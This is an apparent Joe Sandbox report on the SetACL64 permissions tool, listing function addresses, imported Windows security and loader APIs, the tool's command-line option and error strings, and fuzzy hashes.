Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 89a5a3ef5b4c50bf8ebc705ee340fd4fffb8f9892841d30dbb7076e131b2c7ac
Instruction ID: 6525c566b81e4560cd06c3c7b737e842be0b9f20793ab89dcce1bdbe423cd5f7
Opcode Fuzzy Hash: 89a5a3ef5b4c50bf8ebc705ee340fd4fffb8f9892841d30dbb7076e131b2c7ac
Instruction Fuzzy Hash: 4FF09AE0F0A20781FF745BA698013F942A0DF88BC0F4C50B0D91ECA7C2FE6EE4818660

Function 00007FF697031130 Relevance: 1.5, APIs: 1, Instructions: 20networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FF697031171

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: e2e48b089702cd41e97987c4de5919cfb4dbdded5e8bd07c72deee5bbe57a52e
Instruction ID: ae9a9752ab95968492bb6e33dc0d211ada698fa6ce1ff58d8bc978f13bafe029
Opcode Fuzzy Hash: e2e48b089702cd41e97987c4de5919cfb4dbdded5e8bd07c72deee5bbe57a52e
Instruction Fuzzy Hash: 9BF01CF1E196828AFB71EB14E8553B533A0FF98799F840072C58DC62A4DE2DE546CB50

Non-executed Functions

Function 00007FF69705E530 Relevance: 177.8, APIs: 61, Strings: 39, Instructions: 2831COMMON

Download Yara Rule

APIs

GetSecurityDescriptorControl.ADVAPI32 ref: 00007FF69705F168
GetLastError.KERNEL32 ref: 00007FF69705F179
LocalFree.KERNEL32 ref: 00007FF69705F260
IsValidSid.ADVAPI32 ref: 00007FF69705F475
IsValidSid.ADVAPI32 ref: 00007FF69705F572

Part of subcall function 00007FF697063B20: GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00000000,00001000,?,00007FF69705F5AD), ref: 00007FF697063B8B

GetAclInformation.ADVAPI32 ref: 00007FF69705F695
GetLastError.KERNEL32 ref: 00007FF69705F69F
GetAce.ADVAPI32 ref: 00007FF69705F6DA
DeleteAce.ADVAPI32 ref: 00007FF69705F6F4
GetLastError.KERNEL32 ref: 00007FF69705F73E
GetAclInformation.ADVAPI32 ref: 00007FF69705F76E
GetLastError.KERNEL32 ref: 00007FF69705F778
GetAce.ADVAPI32 ref: 00007FF69705F7AA
DeleteAce.ADVAPI32 ref: 00007FF69705F7D4
GetLastError.KERNEL32 ref: 00007FF69705F80F
GetAclInformation.ADVAPI32 ref: 00007FF69705F861
GetLastError.KERNEL32 ref: 00007FF69705F86B
GetAce.ADVAPI32 ref: 00007FF69705F89A
DeleteAce.ADVAPI32 ref: 00007FF69705F8B8
GetAclInformation.ADVAPI32 ref: 00007FF69705F919
GetLastError.KERNEL32 ref: 00007FF69705F923
GetAce.ADVAPI32 ref: 00007FF69705F95A

Part of subcall function 00007FF6970639C0: GetAclInformation.ADVAPI32(?,?,00000000,00000000,00000000,00000007,?,00007FF697061FD2), ref: 00007FF697063A15
Part of subcall function 00007FF6970639C0: GetAce.ADVAPI32(?,?,00000000,00000000,00000000,00000007,?,00007FF697061FD2), ref: 00007FF697063A3A
Part of subcall function 00007FF6970639C0: EqualSid.ADVAPI32(?,?,00000000,00000000,00000000,00000007,?,00007FF697061FD2), ref: 00007FF697063A55

DeleteAce.ADVAPI32 ref: 00007FF69705F98A

Part of subcall function 00007FF697044230: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69704428B

Part of subcall function 00007FF697039420: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970394AC

ConvertSecurityDescriptorToStringSecurityDescriptorW.ADVAPI32 ref: 00007FF69705F9DD
SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00007FF697060653
SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00007FF6970608E5
SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00007FF697060A00
SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00007FF697060A78
SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00007FF697060AA2
SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00007FF697060BBD
SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00007FF697060C35
SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00007FF697060E1C
SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00007FF697060EB8
SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00007FF697060FE0
SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00007FF69706107C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970616A0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970616A6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970616B2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970616B8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970616BE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970616C4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970616CA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970616D0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970616D6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970616DC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970616E2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970616E8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970616EE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970616FA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697061700
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697061706
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697061712
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697061718
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697061724
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706172A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697061730
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706173C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697061742
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697061748
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706174E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697061754

Strings

Group: [empty], xrefs: 00007FF697060FD2
Group: [NULL], xrefs: 00007FF69706106E
Parsing the SD of <, xrefs: 00007FF69705F1A6
:[NULL], xrefs: 00007FF6970605ED, 00007FF697060883
DACL, xrefs: 00007FF697060411, 00007FF6970604F0, 00007FF69706054D, 00007FF6970605DC
Group:, xrefs: 00007FF697060BDF
(not_protected, xrefs: 00007FF69705F4F6, 00007FF69705F5EE
DACL, xrefs: 00007FF69706118E, 00007FF6970611F4, 00007FF6970612A9
Owner: [NULL], xrefs: 00007FF697060EAA
Owner:, xrefs: 00007FF697060A22
(protected, xrefs: 00007FF69705F44F, 00007FF69705F55D
Omitting ACL of: <, xrefs: 00007FF69705EAF0
Owner: [error:, xrefs: 00007FF697060D7C
> has a NULL security descriptor (granting full control to everyone) and is being ignored., xrefs: 00007FF69705F001
Group:[empty], xrefs: 00007FF697060BAF
> because a filter keyword matched., xrefs: 00007FF69705EB0A
+auto_inherited), xrefs: 00007FF69705F51B, 00007FF69705F61A
:[empty], xrefs: 00007FF697060504, 00007FF69706079F
Owner:[NULL], xrefs: 00007FF697060A6A
The object <, xrefs: 00007FF69705EFE7
: [NULL], xrefs: 00007FF6970612BA, 00007FF697061527
SACL, xrefs: 00007FF697061404, 00007FF69706146A, 00007FF697061516
Owner:[error:, xrefs: 00007FF697060960
DACL: [error:, xrefs: 00007FF6970610F1
: [empty], xrefs: 00007FF6970611A2, 00007FF697061418
Owner: [empty], xrefs: 00007FF697060E0E
> failed with: , xrefs: 00007FF69705F1BA
Group:[NULL], xrefs: 00007FF697060C27
ListSD, xrefs: 00007FF69705EB61, 00007FF69705F05B, 00007FF69705F1E3, 00007FF697061661
: , xrefs: 00007FF697061208, 00007FF69706147E
Owner: , xrefs: 00007FF697060E3E
Group: [error:, xrefs: 00007FF697060F40
Group: , xrefs: 00007FF697061002
Owner:[empty], xrefs: 00007FF6970609F2
:[error:, xrefs: 00007FF697060425, 00007FF6970606BE
SACL: [error:, xrefs: 00007FF697061367
Group:[error:, xrefs: 00007FF697060B1D
SACL, xrefs: 00007FF6970606AA, 00007FF69706078B, 00007FF6970607EA, 00007FF697060872
(pseudo_protected, xrefs: 00007FF69705F4C6, 00007FF69705F5B7

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$SimpleString::operator=$ErrorLast$Information$Delete$DescriptorSecurity$Valid$ControlConvertEqualFreeLocalString
String ID: DACL$ DACL: [error:$ Group: $ Group: [NULL]$ Group: [empty]$ Group: [error:$ Owner: $ Owner: [NULL]$ Owner: [empty]$ Owner: [error:$ SACL$ SACL: [error:$(not_protected$(protected$(pseudo_protected$+auto_inherited)$: $: [NULL]$: [empty]$:[NULL]$:[empty]$:[error:$> because a filter keyword matched.$> failed with: $> has a NULL security descriptor (granting full control to everyone) and is being ignored.$DACL$Group:$Group:[NULL]$Group:[empty]$Group:[error:$ListSD$Omitting ACL of: <$Owner:$Owner:[NULL]$Owner:[empty]$Owner:[error:$Parsing the SD of <$SACL$The object <
API String ID: 503136041-36202760
Opcode ID: 95b1e73e3a08943be6edc322f9fce221ccbe777883c1dbf8b4f712d1b5456688
Instruction ID: c61d022b5473a8d2530f80ca1e0db0683317e045753eb5e619977dcbaacbdab1
Opcode Fuzzy Hash: 95b1e73e3a08943be6edc322f9fce221ccbe777883c1dbf8b4f712d1b5456688
Instruction Fuzzy Hash: 76537FA2A197C299EB709F24D8547ED2361EB513D8F405272D64DC7AE9EF7CE688C300

Function 00007FF697031A30 Relevance: 157.3, Strings: 121, Instructions: 6075COMMON

Download Yara Rule

Strings

wmi, xrefs: 00007FF6970322E8
cont, xrefs: 00007FF697032BC9
csv, xrefs: 00007FF6970342E8, 00007FF69703560B
own, xrefs: 00007FF69703564A
-dom, xrefs: 00007FF697034574
WARNING: The parameter <%s> contains a double quotation mark (". Did you unintentionally escape a double quote? Hint: use <"C:\\">, xrefs: 00007FF697031E3B
setprot, xrefs: 00007FF6970329E7
> in a parameter option -ace specified: , xrefs: 00007FF6970365A8, 00007FF6970366AA
ERROR while processing command line: primary group: , xrefs: 00007FF697037719
in a parameter option -lst specified: , xrefs: 00007FF697037D56, 00007FF697037E51, 00007FF697037F4C, 00007FF697038048
-clr, xrefs: 00007FF6970330E7
ace, xrefs: 00007FF697032470
-grp, xrefs: 00007FF697034DCB
remtrst, xrefs: 00007FF697033F5F
> in a parameter option -lst specified: , xrefs: 00007FF697038258, 00007FF697038353
restore, xrefs: 00007FF6970325E2
ERROR in command line: Invalid option specified: , xrefs: 00007FF697038688
> in a parameter option -trst specified: , xrefs: 00007FF697036B5B
aud_succ, xrefs: 00007FF6970339B9
deny, xrefs: 00007FF69703391D
prn, xrefs: 00007FF69703223D
trustee, xrefs: 00007FF6970324CB
-silent, xrefs: 00007FF697031D0A
ERROR (internal) while processing command line: object flags: , xrefs: 00007FF697037BEA
ERROR in command line: Invalid parameter for option -clr specified: , xrefs: 00007FF6970361BC
ERROR while processing command line: object (name, type): , xrefs: 00007FF697032023, 00007FF697032358
revoke, xrefs: 00007FF69703396B
-op, xrefs: 00007FF697034FDB
ERROR in command line: Invalid action specified: , xrefs: 00007FF697035F39
aud_succ,aud_fail, xrefs: 00007FF697033AA4
-help, xrefs: 00007FF697031BF3
grant, xrefs: 00007FF6970338CF
ERROR while processing command line: Trustee: , xrefs: 00007FF69703445E
-on, xrefs: 00007FF697031FAB
clear, xrefs: 00007FF697032853
ERROR in command line: No parameter found for option , xrefs: 00007FF69703873C, 00007FF697038817
> in a parameter option -grp specified: , xrefs: 00007FF697037529, 00007FF697037624
in a parameter option -ace specified: , xrefs: 00007FF697036290, 00007FF6970363A4, 00007FF6970364A6, 00007FF697038144
sacl, xrefs: 00007FF697032DB9, 00007FF6970331E7, 00007FF697033BB7, 00007FF697034141, 00007FF69703497E, 00007FF69703528D, 00007FF697035D5B
in a parameter option -dom specified: , xrefs: 00007FF697036D55, 00007FF697036E50
ERROR (internal) while processing command line: Action: DELORPHANEDSIDS could not be set!, xrefs: 00007FF697032970
repltrst, xrefs: 00007FF697033FAD
ERROR in command line: Invalid trustee action entry , xrefs: 00007FF697036889
ERROR (internal) while processing command line: Action: , xrefs: 00007FF6970326DB, 00007FF6970327BA
srv, xrefs: 00007FF6970321E5
-actn, xrefs: 00007FF69703241E
ERROR in command line: Invalid list format entry , xrefs: 00007FF697037D42, 00007FF697037E3D, 00007FF697037F38, 00007FF697038034
cpytrst, xrefs: 00007FF697033FFB
ERROR (internal) while processing command line: Action: CLEARDACL could not be set!, xrefs: 00007FF697033170, 00007FF697035ECB, 00007FF69703614E
p_nc, xrefs: 00007FF69703523C, 00007FF6970353BC
dacl, xrefs: 00007FF697032D76, 00007FF697033121, 00007FF697033B6C, 00007FF6970340F4, 00007FF697034931, 00007FF697035108, 00007FF697035D11
ERROR in command line: Invalid ACL type (where) entry , xrefs: 00007FF697036492, 00007FF697036984, 00007FF697036E3C
ERROR (internal) while processing command line: recursion type could not be set!, xrefs: 00007FF697032CC5
in a parameter option -os specified: , xrefs: 00007FF697038508
> in a parameter option -dom specified: , xrefs: 00007FF697036F64, 00007FF69703705F
file, xrefs: 00007FF697032135
ERROR in command line: Invalid protection entry , xrefs: 00007FF6970377F2, 00007FF6970378ED
obj, xrefs: 00007FF697032C49
in a parameter option -trst specified: , xrefs: 00007FF69703689D, 00007FF697036998
ERROR in command line: Invalid access mode entry , xrefs: 00007FF697036390
setgroup, xrefs: 00007FF697032774
aud_fail,aud_succ, xrefs: 00007FF697033A62
sacl,dacl, xrefs: 00007FF697032E3B, 00007FF6970332EE
set, xrefs: 00007FF697033881
ERROR while processing command line: Domain: , xrefs: 00007FF697037152
-lst, xrefs: 00007FF69703545B
-ignoreerr, xrefs: 00007FF697031D55
ERROR (internal) while processing command line: list options: , xrefs: 00007FF697038446
aud_fail, xrefs: 00007FF697033A07
could not be processed!, xrefs: 00007FF697036C62
setowner, xrefs: 00007FF697032695
ERROR in command line: Invalid domain action entry , xrefs: 00007FF697036D41
ERROR (internal) while processing command line: Action: CLEARSACL could not be set!, xrefs: 00007FF6970328BE, 00007FF697033236, 00007FF697033387
ERROR in command line: Invalid entry <, xrefs: 00007FF697036594, 00007FF697036696, 00007FF697036B47, 00007FF697036F50, 00007FF69703704B, 00007FF697037238, 00007FF697037333, 00007FF697037515, 00007FF697037610, 00007FF6970379E8, 00007FF697037AE3, 00007FF697038244, 00007FF69703833F
-ownr, xrefs: 00007FF697034BB9
-ace, xrefs: 00007FF6970333FE
ERROR in command line: Invalid object type specified: , xrefs: 00007FF697035DF7
repldom, xrefs: 00007FF6970347E5
cpydom, xrefs: 00007FF697034833
ERROR while processing command line: Trustee file: , xrefs: 00007FF697036C4E
shr, xrefs: 00007FF697032293
ERROR in command line: Invalid parameter for option -rst specified: , xrefs: 00007FF6970360A1
yes, xrefs: 00007FF697032C09
ERROR in command line: Invalid input file (csv) entry in a parameter option -trst specified: , xrefs: 00007FF697036A8D
-ot, xrefs: 00007FF6970320E3
-log, xrefs: 00007FF697033054
sddl, xrefs: 00007FF6970355B1
could not be set!, xrefs: 00007FF69703203D, 00007FF697032372, 00007FF6970326EF, 00007FF6970327CE, 00007FF697032EDF, 00007FF697032FCF, 00007FF697034472, 00007FF6970367B1, 00007FF697037166, 00007FF697037450, 00007FF69703772D, 00007FF697037BFE, 00007FF69703845A, 00007FF6970385FF
-trst, xrefs: 00007FF697033CB9
in a parameter option -op specified: , xrefs: 00007FF697037806, 00007FF697037901
reg, xrefs: 00007FF69703218D
tab, xrefs: 00007FF6970356C8
p_c, xrefs: 00007FF6970351EC, 00007FF697035371
-fltr, xrefs: 00007FF69703308E
dacl,sacl, xrefs: 00007FF697032E07, 00007FF6970332BA
ERROR (internal) while processing command line: orphaned SID deletion options: , xrefs: 00007FF6970385EB
ProcessCmdLine, xrefs: 00007FF697031B31, 00007FF697031EB7, 00007FF69703205C, 00007FF697032391, 00007FF697032620, 00007FF697032708, 00007FF6970327E7, 00007FF6970328D2, 00007FF697032984, 00007FF697032A36, 00007FF697032AEC, 00007FF697032CD9, 00007FF697032EF8, 00007FF697032FE8, 00007FF697033184, 00007FF69703324A, 00007FF69703339B, 00007FF6970344A2, 00007FF697035E59, 00007FF697035EDF, 00007FF697035F7D, 00007FF697036031, 00007FF6970360E5, 00007FF697036162, 00007FF697036200, 00007FF6970362EE, 00007FF697036402, 00007FF697036504, 00007FF697036606, 00007FF697036708, 00007FF6970367E1, 00007FF6970368FB, 00007FF6970369F6, 00007FF697036AD1, 00007FF697036BB9, 00007FF697036C92, 00007FF697036DB3, 00007FF697036EAE, 00007FF697036FC2, 00007FF6970370BD, 00007FF697037196, 00007FF6970372AA, 00007FF6970373A5, 00007FF697037480, 00007FF697037587, 00007FF697037682, 00007FF69703775D, 00007FF697037864, 00007FF69703795F, 00007FF697037A5A, 00007FF697037B55, 00007FF697037C17, 00007FF697037CB9, 00007FF697037DB4, 00007FF697037EAF, 00007FF697037FAA, 00007FF6970380A6, 00007FF6970381A2, 00007FF6970382B6, 00007FF6970383B1, 00007FF697038473, 00007FF697038566, 00007FF697038618, 00007FF6970386CC, 00007FF69703879E, 00007FF697038879
-os, xrefs: 00007FF697035C6E
> in a parameter option -op specified: , xrefs: 00007FF6970379FC, 00007FF697037AF7
-rec, xrefs: 00007FF697032B4F
ERROR in command line: Invalid number of entries in parameter for option -op specified: , xrefs: 00007FF697037C75
-rst, xrefs: 00007FF697032D3C
ERROR while processing command line: ACE: , xrefs: 00007FF69703679D
Type 'SetACL -help' for help., xrefs: 00007FF697031B1D, 00007FF697034489, 00007FF697035E36, 00007FF697035F64, 00007FF697036018, 00007FF6970360CC, 00007FF6970361E7, 00007FF6970362D5, 00007FF6970363E9, 00007FF6970364EB, 00007FF6970365ED, 00007FF6970366EF, 00007FF6970367C8, 00007FF6970368E2, 00007FF6970369DD, 00007FF697036AB8, 00007FF697036BA0, 00007FF697036C79, 00007FF697036D9A, 00007FF697036E95, 00007FF697036FA9, 00007FF6970370A4, 00007FF69703717D, 00007FF697037291, 00007FF69703738C, 00007FF697037467, 00007FF69703756E, 00007FF697037669, 00007FF697037744, 00007FF69703784B, 00007FF697037946, 00007FF697037A41, 00007FF697037B3C, 00007FF697037CA0, 00007FF697037D9B, 00007FF697037E96, 00007FF697037F91, 00007FF69703808D, 00007FF697038189, 00007FF69703829D, 00007FF697038398, 00007FF69703854D, 00007FF6970386B3, 00007FF69703877B, 00007FF697038856
-raw, xrefs: 00007FF697031D9E
delorphanedsids, xrefs: 00007FF697032935
ERROR in command line: Invalid inheritance entry , xrefs: 00007FF69703627C
ERROR in command line: Invalid recursion type specified: , xrefs: 00007FF697035FED
-bckp, xrefs: 00007FF697032F64
ERROR (internal) while processing command line: Action: SETINHFROMPAR could not be set!, xrefs: 00007FF697032A22
INFO: The restore action ignores the object name parameter (paths are read from the backup file). However, other actions that requ, xrefs: 00007FF69703260C
list, xrefs: 00007FF697032587
ERROR (internal) while processing command line: Action: RESETCHILDPERMS could not be set!, xrefs: 00007FF697032AD8
cont_obj, xrefs: 00007FF697032C86
rstchldrn, xrefs: 00007FF697032A99
ERROR while processing command line: Owner: , xrefs: 00007FF69703743C
> in a parameter option -ownr specified: , xrefs: 00007FF69703724C, 00007FF697037347
remdom, xrefs: 00007FF697034797
ERROR in command line: Invalid list what entry , xrefs: 00007FF697038130, 00007FF6970384F4
ERROR (internal) while processing command line: Backup/Restore file: , xrefs: 00007FF697032ECB, 00007FF697032FBB
domain, xrefs: 00007FF697032529

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID:
String ID: Type 'SetACL -help' for help.$ could not be processed!$ could not be set!$ in a parameter option -ace specified: $ in a parameter option -dom specified: $ in a parameter option -lst specified: $ in a parameter option -op specified: $ in a parameter option -os specified: $ in a parameter option -trst specified: $-ace$-actn$-bckp$-clr$-dom$-fltr$-grp$-help$-ignoreerr$-log$-lst$-on$-op$-os$-ot$-ownr$-raw$-rec$-rst$-silent$-trst$> in a parameter option -ace specified: $> in a parameter option -dom specified: $> in a parameter option -grp specified: $> in a parameter option -lst specified: $> in a parameter option -op specified: $> in a parameter option -ownr specified: $> in a parameter option -trst specified: $ERROR (internal) while processing command line: Action: $ERROR (internal) while processing command line: Action: CLEARDACL could not be set!$ERROR (internal) while processing command line: Action: CLEARSACL could not be set!$ERROR (internal) while processing command line: Action: DELORPHANEDSIDS could not be set!$ERROR (internal) while processing command line: Action: RESETCHILDPERMS could not be set!$ERROR (internal) while processing command line: Action: SETINHFROMPAR could not be set!$ERROR (internal) while processing command line: Backup/Restore file: $ERROR (internal) while processing command line: list options: $ERROR (internal) while processing command line: object flags: $ERROR (internal) while processing command line: orphaned SID deletion options: $ERROR (internal) while processing command line: recursion type could not be set!$ERROR in command line: Invalid ACL type (where) entry $ERROR in command line: Invalid access mode entry $ERROR in command line: Invalid action specified: $ERROR in command line: Invalid domain action entry $ERROR in command line: Invalid entry <$ERROR in command line: Invalid inheritance entry $ERROR in command line: Invalid input file (csv) entry in a parameter option -trst specified: $ERROR in command line: Invalid list format entry $ERROR in command line: Invalid list what entry $ERROR in command line: Invalid number of entries in parameter for option -op specified: $ERROR in command line: Invalid object type specified: $ERROR in command line: Invalid option specified: $ERROR in command line: Invalid parameter for option -clr specified: $ERROR in command line: Invalid parameter for option -rst specified: $ERROR in command line: Invalid protection entry $ERROR in command line: Invalid recursion type specified: $ERROR in command line: Invalid trustee action entry $ERROR in command line: No parameter found for option $ERROR while processing command line: ACE: $ERROR while processing command line: Domain: $ERROR while processing command line: Owner: $ERROR while processing command line: Trustee file: $ERROR while processing command line: Trustee: $ERROR while processing command line: object (name, type): $ERROR while processing command line: primary group: $INFO: The restore action ignores the object name parameter (paths are read from the backup file). However, other actions that requ$ProcessCmdLine$WARNING: The parameter <%s> contains a double quotation mark (". Did you unintentionally escape a double quote? Hint: use <"C:\\">$ace$aud_fail$aud_fail,aud_succ$aud_succ$aud_succ,aud_fail$clear$cont$cont_obj$cpydom$cpytrst$csv$dacl$dacl,sacl$delorphanedsids$deny$domain$file$grant$list$obj$own$p_c$p_nc$prn$reg$remdom$remtrst$repldom$repltrst$restore$revoke$rstchldrn$sacl$sacl,dacl$sddl$set$setgroup$setowner$setprot$shr$srv$tab$trustee$wmi$yes
API String ID: 0-425451505
Opcode ID: 6b2fc4d373cf05abc5e4d6a0f530dc29495f5d2a2d032dd04ea78fda412acef8
Instruction ID: 749e362cb7efab0eecb2a6eddd94ea8c2eed08bf978df002f0876fbd7715e416
Opcode Fuzzy Hash: 6b2fc4d373cf05abc5e4d6a0f530dc29495f5d2a2d032dd04ea78fda412acef8
Instruction Fuzzy Hash: 38D311E1A6A68255EB30EF61D951AFD2360FF913C8F801572D60DDB69BEE2CE605C340

Function 00007FF697071DAC Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 169libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF697071DB9
GetProcAddress.KERNEL32 ref: 00007FF697071DCC
GetProcAddress.KERNEL32 ref: 00007FF697071DE3
GetProcAddress.KERNEL32 ref: 00007FF697071DFA
GetProcAddress.KERNEL32 ref: 00007FF697071E11
GetProcAddress.KERNEL32 ref: 00007FF697071E28
GetProcAddress.KERNEL32 ref: 00007FF697071E3F
GetProcAddress.KERNEL32 ref: 00007FF697071E56
GetProcAddress.KERNEL32 ref: 00007FF697071E6D
GetProcAddress.KERNEL32 ref: 00007FF697071E84
GetProcAddress.KERNEL32 ref: 00007FF697071E9B
GetProcAddress.KERNEL32 ref: 00007FF697071EB2
GetProcAddress.KERNEL32 ref: 00007FF697071EC9
GetProcAddress.KERNEL32 ref: 00007FF697071EE0
GetProcAddress.KERNEL32 ref: 00007FF697071EF7
GetProcAddress.KERNEL32 ref: 00007FF697071F0E
GetProcAddress.KERNEL32 ref: 00007FF697071F25
GetProcAddress.KERNEL32 ref: 00007FF697071F3C
GetProcAddress.KERNEL32 ref: 00007FF697071F53
GetProcAddress.KERNEL32 ref: 00007FF697071F6A
GetProcAddress.KERNEL32 ref: 00007FF697071F81
GetProcAddress.KERNEL32 ref: 00007FF697071F98
GetProcAddress.KERNEL32 ref: 00007FF697071FAF
GetProcAddress.KERNEL32 ref: 00007FF697071FC6
GetProcAddress.KERNEL32 ref: 00007FF697071FDD
GetProcAddress.KERNEL32 ref: 00007FF697071FF4
GetProcAddress.KERNEL32 ref: 00007FF69707200B
GetProcAddress.KERNEL32 ref: 00007FF697072022
GetProcAddress.KERNEL32 ref: 00007FF697072039
GetProcAddress.KERNEL32 ref: 00007FF697072050
GetProcAddress.KERNEL32 ref: 00007FF697072067
GetProcAddress.KERNEL32 ref: 00007FF69707207E
GetProcAddress.KERNEL32 ref: 00007FF697072095
GetProcAddress.KERNEL32 ref: 00007FF6970720AC
GetProcAddress.KERNEL32 ref: 00007FF6970720C3
GetProcAddress.KERNEL32 ref: 00007FF6970720DA
GetProcAddress.KERNEL32 ref: 00007FF6970720F1
GetProcAddress.KERNEL32 ref: 00007FF697072108
GetProcAddress.KERNEL32 ref: 00007FF69707211F
GetProcAddress.KERNEL32 ref: 00007FF697072136
GetProcAddress.KERNEL32 ref: 00007FF69707214D

Strings

SleepConditionVariableCS, xrefs: 00007FF69707203F
SetFileInformationByHandle, xrefs: 00007FF697071FCC
CompareStringEx, xrefs: 00007FF69707210E
InitializeConditionVariable, xrefs: 00007FF697071FFA
CreateThreadpoolWait, xrefs: 00007FF697071EE6
FlsSetValue, xrefs: 00007FF697071E00
WakeAllConditionVariable, xrefs: 00007FF697072028
LCMapStringEx, xrefs: 00007FF69707213C
SleepConditionVariableSRW, xrefs: 00007FF6970720B2
CreateEventExW, xrefs: 00007FF697071E45
TryAcquireSRWLockExclusive, xrefs: 00007FF697072084
GetLocaleInfoEx, xrefs: 00007FF697072125
InitializeSRWLock, xrefs: 00007FF697072056
FlsAlloc, xrefs: 00007FF697071DC2
kernel32.dll, xrefs: 00007FF697071DB2
CreateSemaphoreExW, xrefs: 00007FF697071E73
GetCurrentPackageId, xrefs: 00007FF697071F87
SetThreadpoolTimer, xrefs: 00007FF697071EA1
FlushProcessWriteBuffers, xrefs: 00007FF697071F2B
CloseThreadpoolWork, xrefs: 00007FF6970720F7
CreateThreadpoolTimer, xrefs: 00007FF697071E8A
SubmitThreadpoolWork, xrefs: 00007FF6970720E0
SetThreadpoolWait, xrefs: 00007FF697071EFD
AcquireSRWLockExclusive, xrefs: 00007FF69707206D
WakeConditionVariable, xrefs: 00007FF697072011
InitOnceExecuteOnce, xrefs: 00007FF697071E2E
FlsGetValue, xrefs: 00007FF697071DE9
